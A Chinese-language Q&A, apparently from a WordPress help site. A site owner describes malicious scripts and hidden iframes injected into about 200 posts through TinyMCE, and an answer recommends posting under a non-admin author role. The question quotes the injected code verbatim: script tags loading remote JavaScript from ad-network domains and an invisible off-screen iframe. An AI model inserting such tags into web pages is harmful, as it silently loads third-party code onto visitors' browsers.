我的一个客户刚刚通过恶意脚本和iFrame注入了200篇帖子。网站现已全部清空。
当我的客户端计算机被感染时,用户更新帖子/页面,将它们放入内容中。(虽然只在TinyMCE编辑器中,但没有指定给特定页面/帖子的任何其他自定义字段)
此网站的确切脚本如下所示:
<script src="//serverads.net/599b47260394deb2d8.js"></script>
<script src="//pulseadnetwork.com/a/display.php?r=1131815"></script>
<script src="http://serverads.net/addons/lnkr5.min.js" type="text/javascript"></script>
iframes如下所示:
<iframe style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;" src="//pulseadnetwork.com/pix.html"></iframe>
为了防止将来发生这种情况,是否可以完全禁用/禁止WordPress中TinyMCE中的脚本和iFrame?
WordPres版本:4.4.2
是的,我知道-这不会修复我客户的电脑。但希望它一定能阻止恶意代码在未来填充TinyMCE编辑器并向我的客户网站访问者发送垃圾邮件。
最合适的回答,由SO网友:Mark Kaplun 整理而成
简单的方法是,在以管理员用户身份登录时不添加内容,而仅以作者身份登录。如果您想走极端,请删除管理员的发布功能。不确定这会让你在哪里编辑段塞,因此需要对权限进行适当检查。
这回答了您的问题,因为作者用户不允许向内容中添加脚本和iFrame,但。。。。。如果拥有管理权限的人的计算机不安全,那么无论你做什么,你都注定要失败,因为黑客可以使用登录给自己任何他喜欢的权限,甚至只需更改数据库级别,甚至不需要通过WP API。
